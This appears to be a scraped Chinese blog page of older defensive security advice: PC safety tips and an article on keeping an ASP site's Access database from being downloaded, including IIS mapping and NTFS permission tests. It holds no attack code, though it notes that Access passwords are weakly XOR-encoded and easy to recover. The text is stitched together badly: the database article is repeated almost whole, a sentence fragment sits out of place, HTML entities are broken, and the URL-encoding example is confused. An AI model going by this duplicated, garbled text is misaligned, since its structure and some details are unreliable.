在使用聊天軟件的時候,最好設置為隱藏用戶,以免別有用心者使用一些專用軟件查看到你的IP地址,然后采用一些針對IP 地址的黑客工具對你進行攻擊。在聊天室的時候,還要預防Java炸彈,攻擊者通常發送一些帶惡意代碼的HTML語句使你的電腦打開無數個窗口或顯示巨型圖片,最終導致死機。你只需禁止Java腳本的運行和顯示圖像功能就可以避免遭到攻擊了,但這時你就沒法訪問一些交互式網頁了,這需要你個人權衡。
防止特洛伊木馬安全準則
不要太容易信任別人,不要輕易安裝和運行從那些不知名的網站(特別是不可靠的FTP站點)下載的軟件和來歷不明的軟件。有些程序可能是木馬程序,如果你一旦安裝了這些程序,它們就會在你不知情的情況下更改你的系統或者連接到遠程的服務器。這樣,黑客就可以很容易進入你的電腦。筆者并不是讓大家不信任來自Internet的任何東西,因為即使是很大的網站,都有可能遭到黑客的破壞。對于此類軟件,即使通過了一般反病毒軟件的檢查也不要輕易運行,要用如Cleaner等專門的黑客程序清除軟件檢查,并且需要提醒大家注意的是這些軟件的病毒庫文件要經常更新。同時不要讓他人隨意在您的計算機上安裝軟件。另外如果是購買二手電腦,不要購買或者使用那些曾經受過入侵,但仍未清理過硬盤的二手電腦。因為這樣很可能為黑客提供了入侵你的電腦的機會,最好
定期升級你的系統
很多常用的程序和操作系統的內核都會發現漏洞,某些漏洞會讓入侵者很容易進入到你的系統,這些漏洞會以很快的速度在黑客中傳開。如近期流傳極廣的尼姆達病毒就是針對微軟信件瀏覽器的弱點和Windows NT/2000、IIS的漏洞而編寫出的一種傳播能力很強的病毒。因此,用戶一定要小心防范。軟件的開發商會把補丁公布,以便用戶補救這些漏洞。建議用戶訂閱關于這些漏洞的郵件列表,以便及時知道這些漏洞后打上補丁,以防黑客攻擊。當然最好使用最新版本的瀏覽器軟件、電子郵件軟件以及其他程序,但不要是測試版本。
安裝防火墻
不要在沒有防火墻的情況下上網沖浪。如果你使用的是寬帶連接,例如ADSL或者光纖,那么你就會在任何時候都連上Internet,這樣,你就很有可能成為那些鬧著玩的黑客的目標。最好在不需要的時候斷開連接,如可以在你的電腦上裝上防黑客的防火墻——一種反入侵的程序作為你的電腦的門衛,以監視數據流動或是斷開網絡連接。如Lockdown2000 、ZoneAlarm、天網或者其他的一些個人防火墻軟件。另外如瑞星、江民、金山公司的最新版殺毒軟件都附有防火墻,可以起到殺毒、防黑的雙重功效,值得信賴。
禁止文件共享
局域網里的用戶喜歡將自己的電腦設置為文件共享,以方便相互之間資源共享,但是如果你設了共享的話,就為那些黑客留了后門,這樣他們就有機可乘進入你的電腦偷看你的文件,甚至搞些小破壞。建議在非設共享不可的情況下,最好為共享文件夾設置一個密碼,否則公眾以及你的對手將可以自由地訪問你的那些共享文件。
如果你在上網時遵守了以上這些準則的話,就可以在一定程度上保證個人電腦的安全,避免黑客的攻擊。
是重新格式化硬盤,并重裝操作系統。
推薦:防止ACCESS數據庫被下載的幾種方法
[ 2007-03-25 03:04:51 | 作者: sun ]
昨天和animator試驗了一下,把data.mdb文件改名為data.asp文件后放在wwwroot目錄里。然后在IE中輸入data.asp路徑后,發現IE顯示一片空白,右鍵->察看源文件,跳出記事本,將內容另存為.mdb文件,用ACCESS打開,發現需要密碼,也就是說至少文件頭被破壞。
然后用Flashget試驗下載data.asp文件,并另存為data.mdb文件,發現用ACCESS打開完好無損!看來,好一些編程人員在開發的時候都認為,改了mdb后綴為asp就能防下載的概念,是錯的!后臺數據庫被下載對于一個asp+access的網站來說無疑是一場慘絕人寰的災難。今天找了各方的文章,歸納一下有以下9種辦法防止數據庫被下載(歡迎補充)。
1.發揮你的想象力修改數據庫文件名
不用說,這是最最偷懶的方法,但是若攻擊者通過第三方途徑獲得了數據庫的路徑,就玩完了。比如說攻擊者本來只能拿到list權,結果意外看到了數據庫路徑,就可以冠冕堂皇地把數據庫下載回去研究了。另外,數據文件通常大小都比較大,起再隱蔽的文件名都瞞不了人。故保密性為最低。
2.數據庫名后綴改為ASA、ASP等
此法須配合一些要進行一些設置,否則就會出現本文開頭的那種情況。
(1)二進制字段添加。
(2)在這個文件中加入,IIS就會按ASP語法來解析,然后就會報告500錯誤,自然不能下載了。可是如果只是簡單的在數據庫的文本或者備注字段加入<%是沒用的,因為ACCESS會對其中的內容進行處理,在數據庫里他會以<%的形式存在,無效!正確的方法是將<%存入OLE對象字段里,這樣我們的目的就能達到了。
操作方法:
首先,用notepad新建一個內容為<%的文本文件,隨便起個名字存檔。
接著,用Access打開您的數據庫文件,新建一個表,隨便起個名字,在表中添加一個OLE對象的字段,然后添加一個記錄,插入之前建立的文本文件,如果操作正確的話,應該可以看到一個新的名為"數據包"的記錄。即可。
3.數據庫名前加"#"
只需要把數據庫文件前名加上#、然后修改數據庫連接文件(如conn.asp)中的數據庫地址。原理是下載的時候只能識別#號前名的部分,對于后面的自動去掉,比如你要下載:http://www.pcdigest.com/date/#123.mdb(假設存在的話)。無論是IE還是FLASHGET等下到的都是http://www.test.com/date/index.htm(index.asp、default.jsp等你在IIS設置的首頁文檔)。
另外在數據庫文件名中保留一些空格也起到類似作用,由于HTTP協議對地址解析的特殊性,空格會被編碼為"%",如http://www.test.com/date/123;456.mdb,下載的時http://www.test.com/date/123%456.mdb。而我們的目錄就根本沒有123%456.mdb這個文件,所以下載也是無效的這樣的修改后,即使你暴露了數據庫地址,一般情況下別人也是無法下載!
4.加密數據庫
首先在選取"工具->安全->加密/解密數據庫,選取數據庫(如:employer.mdb),然后接確定,接著會出現"數據庫加密后另存為"的窗口,存為:employer1.mdb。接著employer.mdb就會被編碼,然后存為employer1.mdb..要注意的是,以上的動作并不是對數據庫設置密碼,而只是對數據庫文件加以編碼,目的是為了防止他人使用別的工具來查看數據庫文件的內容。
接下來我們為數據庫加密,首先以打開經過編碼了的employer1.mdb,在打開時,選擇"獨占"方式。然后選取功能表的"工具->安全->設置數據庫密碼",接著輸入密碼即可。這樣即使他人得到了employer1.mdb文件,沒有密碼他是無法看到employer1.mdb的。
加密后要修改數據庫連接頁,如:
conn.open "driver={ microsoft access driver&nb sp;
(*.mdb) };uid=admin;pwd=數據庫密碼;dbq=數據庫路徑"
這樣修改后,數據庫即使被人下載了,別人也無法打開(前提是你的數據庫連接頁中的密碼沒有被泄露)。
但值得注意的是,由于Access數據庫的加密機制比較簡單,即使設置了密碼,解密也很容易。該數據庫系統通過將用戶輸入的密碼與某一固定密鑰進行"異或"來形成一個加密串,并將其存儲在*.mdb文件從地址"&H42"開始的區域內。所以一個好的程序員可以輕松制作一個幾十行的小程序就可以輕松地獲得任何Access數據庫的密碼。因此,只要數據庫被下載,其信息安全依然是個未知數。
5.數據庫放在WEB目錄外或將數據庫連接文件放到其他虛擬目錄下
如你的WEB目錄是e:\webroot,可以把數據庫放到e:\data這個文件夾里,在e:\webroot里的數據庫連接頁中修改數據庫連接地址為:"../data/數據庫名"的形式,這樣數據庫可以正常調用,但是無法下載的,因為它不在WEB目錄里!這個方法一般也不適合購買虛擬空間的用戶。
6.使用ODBC數據源
在ASP等程序設計中,如果有條件,應盡量使用ODBC數據源,不要把數據庫名寫在程序中,否則,數據庫名將隨ASP源代碼的失密而一同失密,例如:
DBPath = Server.MapPath("../123/ abc/asfadf.mdb ")
conn.open "driver={ Microsoft Access Driver&nb sp;(*.mdb) };dbq="& DBPath
可見,即使數據庫名字起得再怪異,隱藏的目錄再深,ASP源代碼失密后,也很容易被下載下來。如果使用ODBC數據源,就不會存在這樣的問題了:conn.open "ODBC-DSN名",不過這樣是比較煩的,目錄移動的話又要重新設置數據源了,更方便的方法請看第7,8法!
7.添加數據庫名的如MDB的擴展映射
這個方法就是通過修改IIS設置來實現,適合有IIS控制權的朋友,不適合購買虛擬主機用戶(除非管理員已經設置了)。這個方法我認為是目前最好的。只要修改一處,整個站點的數據庫都可以防止被下載。無須修改代碼即使暴露目標地址也可以防止下載。
我們在IIS屬性---主目錄---配置---映射---應用程序擴展那里添加.mdb文件的應用解析。注意這里的選擇的DLL(或EXE等)似乎也不是任意的,選擇不當,這個MDB文件還是可以被下載的,注意最好不要選擇選擇asp.dll等。你可以自己多測試下,樣修改后下載數據庫如:http://www.test.com/data/dvbbs6.mdb,就出現(404或500等錯誤)。
8.使用.net的優越性
動網的木鳥就寫過一個防非法下載文件的"WBAL防盜鏈工具"。
不過那個只實現了防止非本地下載的,沒有起到真正的防下載數據庫的功能。不過這個方法已經跟5法差不多可以通過修改.NET文件,實現本地也不能下載!
這幾個方法中,只有第7和8個是統一性改的,一次修改配置后,整個站點的數據庫都可以防止下載,其他幾個就要分別修改數據庫名和連接文件,比較麻煩,不過對于虛擬主機的朋友也只能這樣了!
其實第6個方法應該是第5個方法的擴展,可以實現特殊的功能,但對于不支持.net的主機或者怕設置麻煩的話,還是直接用第5個方法了,而且默認情況下第6個方法,依然可以通過復制連接到同主機的論壇或留言本發表,然后就可以點擊下載了。(因為這樣的引用頁是來自同主機的)
9.利用NTFS分區的文件權限設置(bypercyboy)
我們已經知道,ASP.NET中使用ADO.NET訪問數據庫,通過OleDb的連接可以訪問Access數據庫——我們非常常用的低端數據庫之一。本文討論了ASP.NET中可能看到的若干錯誤提示,從中看到Access2000和AccessXP創建的數據庫文件,在訪問出現錯誤時會出現不太相同的錯誤提示。希望對大家有所幫助。另一個要點是,希望通過此文,使大家對ASP.NET中Access數據庫文件的NTFS權限設置有所新的認識。
(一)實驗過程
為了敘述方便,舉個具體例子做個實驗:應用程序為/test,數據庫存放在D:\wwwroot\test\data\db1.mdb,我們已經知道在ASP.NET中是以一個叫做ASPNET虛擬用戶的身份訪問數據庫的,我們需要給這個賬戶以特定的NTFS權限才能使ASP.NET程序正常運行。
為了得到最嚴格的NTFS權限設置,實驗開始時我們給程序最低的NTFS權限:
a)D:\wwwroot\test\data\文件夾的給用戶ASPNET以如下權限:
允許 拒絕
完全控制 &n bsp; □ □
修改 &nbs p; &nbs p;□ □
讀取及運行 √ □ ;
列出文件夾目錄 ; √ □
讀取 &nbs p; &nbs p;√ □
寫入 &nbs p; &nbs p;□ □
b) D:\wwwroot\test\data\db1.mdb文件本身給用戶ASPNET以如下權限:
√允許將來自父系的可繼承權限傳播給該對象
1.1對于某個只包含有"Select"命令的aspx程序,上述權限設置運行時無障礙,即:上述權限已經滿足這類程序的運行了。
1.2對于包含有"Update""Insert""Update"等命令的aspx程序。
(a)如果db1.mdb是Access2000創建的數據庫,出現如下錯誤:
"/test"應用程序中的服務器錯誤。
MicrosoftJet數據庫引擎打不開文件'D:\wwwroot\test\data\'。 它已經被別的用戶以獨占方式打開,或沒有查看數據的權限。
說明:執行當前Web請求期間,出現未處理的異常。請檢查堆棧跟蹤信息,以了解有關該錯誤以及代碼中導致錯誤的出處的詳細信息。
異常詳細信息:System.Data.OleDb.OleDbException:MicrosoftJet數據庫引擎打不開文件'D:\wwwroot\test\data\'。它已經被別的用戶以獨占方式打開,或沒有查看數據的權限。
(b)如果db1.mdb是AccessXP創建的數據庫,出現如下錯誤:
"/test"應用程序中的服務器錯誤。
操作必須使用一個可更新的查詢。
說明:執行當前Web請求期間,出現未處理的異常。請檢查堆棧跟蹤信息,以了解有關該錯誤以及代碼中導致錯誤的出處的詳細信息。
異常詳細信息:System.Data.OleDb.OleDbException:操作必須使用一個可更新的查詢。
(c)原因初步分析:因為包含有"Update""Insert""Update"等命令,需要對數據庫文件本身進行寫入操作,所以上述權限不能滿足此需求,我們需要進一步放開權限。
我們放開一些權限,
a) D:\wwwroot\test\data\ 文件夾不變;
b) D:\wwwroot\test\data\db1.mdb 文件本身給用戶ASPNET以如下權限;
允許 拒絕
完全控制 &n bsp; □ □
修改 &nbs p; &nbs p;□ □
讀取及運行 √ □ ;
列出文件夾目錄 ; √ □
讀取 &nbs p; &nbs p;√ □
寫入 &nbs p; &nbs p;√ □
1.3 放開權限后繼續實驗
(a)如果db1.mdb是Access2000創建的數據庫,出現如下錯誤:
"/test"應用程序中的服務器錯誤。
不能鎖定文件。
說明:執行當前Web請求期間,出現未處理的異常。請檢查堆棧跟蹤信息,以了解有關該錯誤以及代碼中導致錯誤的出處的詳細信息。
異常詳細信息:System.Data.OleDb.OleDbException:不能鎖定文件。
(b)如果db1.mdb是AccessXP創建的數據庫,沒有出現錯誤。
(c)原因初步分析:我們發現在打開Access數據庫時,同時會在所在目錄生成一個同名的*.ldb文件,這是一個Access的鎖定標記。鑒于此,我們猜測,用戶ASPNET訪問Access數據庫時,也需要生成一個鎖定標記,而該目錄沒有允許其寫入,因此出錯。至于AccessXP創建的數據庫為什么沒有這個錯誤,原因還不得而知。
我們進一步放開權限,
a)D:\wwwroot\test\data\文件夾給用戶ASPNET以如下權限:
允許 拒絕
完全控制 &n bsp; □ □
修改 &nbs p; &nbs p;□ □
讀取及運行 √ □ ;
列出文件夾目錄 ; √ □
讀取 &nbs p; &nbs p;√ □
寫入 &nbs p; &nbs p;√ □
b) D:\wwwroot\test\data\db1.mdb文件本身給用戶ASPNET以如下權限:
√允許將來自父系的可繼承權限傳播給該對象
1.4繼續實驗,發現錯誤已解決,那么上面這個權限就是我們需要放開的"最低權限"。
(a)如果db1.mdb是Access2000創建的數據庫,我們會發現一個小問題:生成的*.ldb文件不會自己刪除,訪問后該文件依然存在,但這個問題不會影響ASP.NET的正常運行。
(b)如果db1.mdb是AccessXP創建的數據庫,沒有出現上面類似問題。
(c)原因初步分析:我們僅僅是給了ASPNET以寫入文件夾的權限,沒有給它修改的權限,所以文件一旦寫入,便無法修改其內容,*.ldb也就刪除不掉了。
如果非要解決這個問題,進一步放開權限為:
a)D:\wwwroot\test\data\文件夾給用戶ASPNET以如下權限:
允許 拒絕
完全控制 &n bsp; □ □
修改 &nbs p; &nbs p;√ □
讀取及運行 √ □ ;
列出文件夾目錄 ; √ □
讀取 &nbs p; &nbs p;√ □
寫入 &nbs p; &nbs p;√ □
b) D:\wwwroot\test\data\db1.mdb 文件本身給用戶ASPNET以如下權限:
√允許將來自父系的可繼承權限傳播給該對象
1.5附帶著,實驗另一種情形:我們把db1.mdb在Access打開編輯,同時訪問ASP.NET。
(a)如果db1.mdb是Access2000創建的數據庫,我們發現并沒有出現什么問題。
(b)如果db1.mdb是AccessXP創建的數據庫,出現如下錯誤:&nb。
然后用Flashget試驗下載data.asp文件,并另存為data.mdb文件,發現用ACCESS打開完好無損!看來,好一些編程人員在開發的時候都認為,改了mdb后綴為asp就能防下載的概念,是錯的!后臺數據庫被下載對于一個asp+access的網站來說無疑是一場慘絕人寰的災難。今天找了各方的文章,歸納一下有以下9種辦法防止數據庫被下載(歡迎補充)。
1.發揮你的想象力修改數據庫文件名
不用說,這是最最偷懶的方法,但是若攻擊者通過第三方途徑獲得了數據庫的路徑,就玩完了。比如說攻擊者本來只能拿到list權,結果意外看到了數據庫路徑,就可以冠冕堂皇地把數據庫下載回去研究了。另外,數據文件通常大小都比較大,起再隱蔽的文件名都瞞不了人。故保密性為最低。
2.數據庫名后綴改為ASA、ASP等
此法須配合一些要進行一些設置,否則就會出現本文開頭的那種情況。
(1)二進制字段添加。
(2)在這個文件中加入,IIS就會按ASP語法來解析,然后就會報告500錯誤,自然不能下載了。可是如果只是簡單的在數據庫的文本或者備注字段加入<%是沒用的,因為ACCESS會對其中的內容進行處理,在數據庫里他會以<%的形式存在,無效!正確的方法是將<%存入OLE對象字段里,這樣我們的目的就能達到了。
操作方法:
首先,用notepad新建一個內容為<%的文本文件,隨便起個名字存檔。
接著,用Access打開您的數據庫文件,新建一個表,隨便起個名字,在表中添加一個OLE對象的字段,然后添加一個記錄,插入之前建立的文本文件,如果操作正確的話,應該可以看到一個新的名為"數據包"的記錄。即可。
3.數據庫名前加"#"
只需要把數據庫文件前名加上#、然后修改數據庫連接文件(如conn.asp)中的數據庫地址。原理是下載的時候只能識別#號前名的部分,對于后面的自動去掉,比如你要下載:http://www.pcdigest.com/date/#123.mdb(假設存在的話)。無論是IE還是FLASHGET等下到的都是http://www.test.com/date/index.htm(index.asp、default.jsp等你在IIS設置的首頁文檔)。
另外在數據庫文件名中保留一些空格也起到類似作用,由于HTTP協議對地址解析的特殊性,空格會被編碼為"%",如http://www.test.com/date/123;456.mdb,下載的時http://www.test.com/date/123%456.mdb。而我們的目錄就根本沒有123%456.mdb這個文件,所以下載也是無效的這樣的修改后,即使你暴露了數據庫地址,一般情況下別人也是無法下載!
4.加密數據庫
首先在選取"工具->安全->加密/解密數據庫,選取數據庫(如:employer.mdb),然后接確定,接著會出現"數據庫加密后另存為"的窗口,存為:employer1.mdb。接著employer.mdb就會被編碼,然后存為employer1.mdb..要注意的是,以上的動作并不是對數據庫設置密碼,而只是對數據庫文件加以編碼,目的是為了防止他人使用別的工具來查看數據庫文件的內容。
接下來我們為數據庫加密,首先以打開經過編碼了的employer1.mdb,在打開時,選擇"獨占"方式。然后選取功能表的"工具->安全->設置數據庫密碼",接著輸入密碼即可。這樣即使他人得到了employer1.mdb文件,沒有密碼他是無法看到employer1.mdb的。
加密后要修改數據庫連接頁,如:
conn.open "driver={ microsoft access driver&nb sp;
(*.mdb) };uid=admin;pwd=數據庫密碼;dbq=數據庫路徑"
這樣修改后,數據庫即使被人下載了,別人也無法打開(前提是你的數據庫連接頁中的密碼沒有被泄露)。
但值得注意的是,由于Access數據庫的加密機制比較簡單,即使設置了密碼,解密也很容易。該數據庫系統通過將用戶輸入的密碼與某一固定密鑰進行"異或"來形成一個加密串,并將其存儲在*.mdb文件從地址"&H42"開始的區域內。所以一個好的程序員可以輕松制作一個幾十行的小程序就可以輕松地獲得任何Access數據庫的密碼。因此,只要數據庫被下載,其信息安全依然是個未知數。
5.數據庫放在WEB目錄外或將數據庫連接文件放到其他虛擬目錄下
如你的WEB目錄是e:\webroot,可以把數據庫放到e:\data這個文件夾里,在e:\webroot里的數據庫連接頁中修改數據庫連接地址為:"../data/數據庫名"的形式,這樣數據庫可以正常調用,但是無法下載的,因為它不在WEB目錄里!這個方法一般也不適合購買虛擬空間的用戶。
6.使用ODBC數據源
在ASP等程序設計中,如果有條件,應盡量使用ODBC數據源,不要把數據庫名寫在程序中,否則,數據庫名將隨ASP源代碼的失密而一同失密,例如:
DBPath = Server.MapPath("../123/ abc/asfadf.mdb ")
conn.open "driver={ Microsoft Access Driver&nb sp;(*.mdb) };dbq="& DBPath
可見,即使數據庫名字起得再怪異,隱藏的目錄再深,ASP源代碼失密后,也很容易被下載下來。如果使用ODBC數據源,就不會存在這樣的問題了:conn.open "ODBC-DSN名",不過這樣是比較煩的,目錄移動的話又要重新設置數據源了,更方便的方法請看第7,8法!
7.添加數據庫名的如MDB的擴展映射
這個方法就是通過修改IIS設置來實現,適合有IIS控制權的朋友,不適合購買虛擬主機用戶(除非管理員已經設置了)。這個方法我認為是目前最好的。只要修改一處,整個站點的數據庫都可以防止被下載。無須修改代碼即使暴露目標地址也可以防止下載。
我們在IIS屬性---主目錄---配置---映射---應用程序擴展那里添加.mdb文件的應用解析。注意這里的選擇的DLL(或EXE等)似乎也不是任意的,選擇不當,這個MDB文件還是可以被下載的,注意最好不要選擇選擇asp.dll等。你可以自己多測試下,樣修改后下載數據庫如:http://www.test.com/data/dvbbs6.mdb,就出現(404或500等錯誤)。
8.使用.net的優越性
動網的木鳥就寫過一個防非法下載文件的"WBAL防盜鏈工具"。
不過那個只實現了防止非本地下載的,沒有起到真正的防下載數據庫的功能。不過這個方法已經跟5法差不多可以通過修改.NET文件,實現本地也不能下載!
這幾個方法中,只有第7和8個是統一性改的,一次修改配置后,整個站點的數據庫都可以防止下載,其他幾個就要分別修改數據庫名和連接文件,比較麻煩,不過對于虛擬主機的朋友也只能這樣了!
其實第6個方法應該是第5個方法的擴展,可以實現特殊的功能,但對于不支持.net的主機或者怕設置麻煩的話,還是直接用第5個方法了,而且默認情況下第6個方法,依然可以通過復制連接到同主機的論壇或留言本發表,然后就可以點擊下載了。(因為這樣的引用頁是來自同主機的)
9.利用NTFS分區的文件權限設置(bypercyboy)
我們已經知道,ASP.NET中使用ADO.NET訪問數據庫,通過OleDb的連接可以訪問Access數據庫——我們非常常用的低端數據庫之一。本文討論了ASP.NET中可能看到的若干錯誤提示,從中看到Access2000和AccessXP創建的數據庫文件,在訪問出現錯誤時會出現不太相同的錯誤提示。希望對大家有所幫助。另一個要點是,希望通過此文,使大家對ASP.NET中Access數據庫文件的NTFS權限設置有所新的認識。
(一)實驗過程
為了敘述方便,舉個具體例子做個實驗:應用程序為/test,數據庫存放在D:\wwwroot\test\data\db1.mdb,我們已經知道在ASP.NET中是以一個叫做ASPNET虛擬用戶的身份訪問數據庫的,我們需要給這個賬戶以特定的NTFS權限才能使ASP.NET程序正常運行。
為了得到最嚴格的NTFS權限設置,實驗開始時我們給程序最低的NTFS權限:
a)D:\wwwroot\test\data\文件夾的給用戶ASPNET以如下權限:
允許 拒絕
完全控制 &n bsp; □ □
修改 &nbs p; &nbs p;□ □
讀取及運行 √ □ ;
列出文件夾目錄 ; √ □
讀取 &nbs p; &nbs p;√ □
寫入 &nbs p; &nbs p;□ □
b) D:\wwwroot\test\data\db1.mdb文件本身給用戶ASPNET以如下權限:
√允許將來自父系的可繼承權限傳播給該對象
1.1對于某個只包含有"Select"命令的aspx程序,上述權限設置運行時無障礙,即:上述權限已經滿足這類程序的運行了。
1.2對于包含有"Update""Insert""Update"等命令的aspx程序。
(a)如果db1.mdb是Access2000創建的數據庫,出現如下錯誤:
"/test"應用程序中的服務器錯誤。
MicrosoftJet數據庫引擎打不開文件'D:\wwwroot\test\data\'。 它已經被別的用戶以獨占方式打開,或沒有查看數據的權限。
說明:執行當前Web請求期間,出現未處理的異常。請檢查堆棧跟蹤信息,以了解有關該錯誤以及代碼中導致錯誤的出處的詳細信息。
異常詳細信息:System.Data.OleDb.OleDbException:MicrosoftJet數據庫引擎打不開文件'D:\wwwroot\test\data\'。它已經被別的用戶以獨占方式打開,或沒有查看數據的權限。
(b)如果db1.mdb是AccessXP創建的數據庫,出現如下錯誤:
"/test"應用程序中的服務器錯誤。
操作必須使用一個可更新的查詢。
說明:執行當前Web請求期間,出現未處理的異常。請檢查堆棧跟蹤信息,以了解有關該錯誤以及代碼中導致錯誤的出處的詳細信息。
異常詳細信息:System.Data.OleDb.OleDbException:操作必須使用一個可更新的查詢。
(c)原因初步分析:因為包含有"Update""Insert""Update"等命令,需要對數據庫文件本身進行寫入操作,所以上述權限不能滿足此需求,我們需要進一步放開權限。
我們放開一些權限,
a) D:\wwwroot\test\data\ 文件夾不變;
b) D:\wwwroot\test\data\db1.mdb 文件本身給用戶ASPNET以如下權限;
允許 拒絕
完全控制 &n bsp; □ □
修改 &nbs p; &nbs p;□ □
讀取及運行 √ □ ;
列出文件夾目錄 ; √ □
讀取 &nbs p; &nbs p;√ □
寫入 &nbs p; &nbs p;√ □
1.3 放開權限后繼續實驗
(a)如果db1.mdb是Access2000創建的數據庫,出現如下錯誤:
"/test"應用程序中的服務器錯誤。
不能鎖定文件。
說明:執行當前Web請求期間,出現未處理的異常。請檢查堆棧跟蹤信息,以了解有關該錯誤以及代碼中導致錯誤的出處的詳細信息。
異常詳細信息:System.Data.OleDb.OleDbException:不能鎖定文件。
(b)如果db1.mdb是AccessXP創建的數據庫,沒有出現錯誤。
(c)原因初步分析:我們發現在打開Access數據庫時,同時會在所在目錄生成一個同名的*.ldb文件,這是一個Access的鎖定標記。鑒于此,我們猜測,用戶ASPNET訪問Access數據庫時,也需要生成一個鎖定標記,而該目錄沒有允許其寫入,因此出錯。至于AccessXP創建的數據庫為什么沒有這個錯誤,原因還不得而知。
我們進一步放開權限,
a)D:\wwwroot\test\data\文件夾給用戶ASPNET以如下權限:
允許 拒絕
完全控制 &n bsp; □ □
修改 &nbs p; &nbs p;□ □
讀取及運行 √ □ ;
列出文件夾目錄 ; √ □
讀取 &nbs p; &nbs p;√ □
寫入 &nbs p; &nbs p;√ □
b) D:\wwwroot\test\data\db1.mdb文件本身給用戶ASPNET以如下權限:
√允許將來自父系的可繼承權限傳播給該對象
1.4繼續實驗,發現錯誤已解決,那么上面這個權限就是我們需要放開的"最低權限"。
(a)如果db1.mdb是Access2000創建的數據庫,我們會發現一個小問題:生成的*.ldb文件不會自己刪除,訪問后該文件依然存在,但這個問題不會影響ASP.NET的正常運行。
(b)如果db1.mdb是AccessXP創建的數據庫,沒有出現上面類似問題。
(c)原因初步分析:我們僅僅是給了ASPNET以寫入文件夾的權限,沒有給它修改的權限,所以文件一旦寫入,便無法修改其內容,*.ldb也就刪除不掉了。
如果非要解決這個問題,進一步放開權限為:
a)D:\wwwroot\test\data\文件夾給用戶ASPNET以如下權限:
允許 拒絕
完全控制 &n bsp; □ □
修改 &nbs p; &nbs p;√ □
讀取及運行 √ □ ;
列出文件夾目錄 ; √ □
讀取 &nbs p; &nbs p;√ □
寫入 &nbs p; &nbs p;√ □
b) D:\wwwroot\test\data\db1.mdb 文件本身給用戶ASPNET以如下權限:
√允許將來自父系的可繼承權限傳播給該對象
1.5附帶著,實驗另一種情形:我們把db1.mdb在Access打開編輯,同時訪問ASP.NET。
(a)如果db1.mdb是Access2000創建的數據庫,我們發現并沒有出現什么問題。
(b)如果db1.mdb是AccessXP創建的數據庫,出現如下錯誤:&nb。
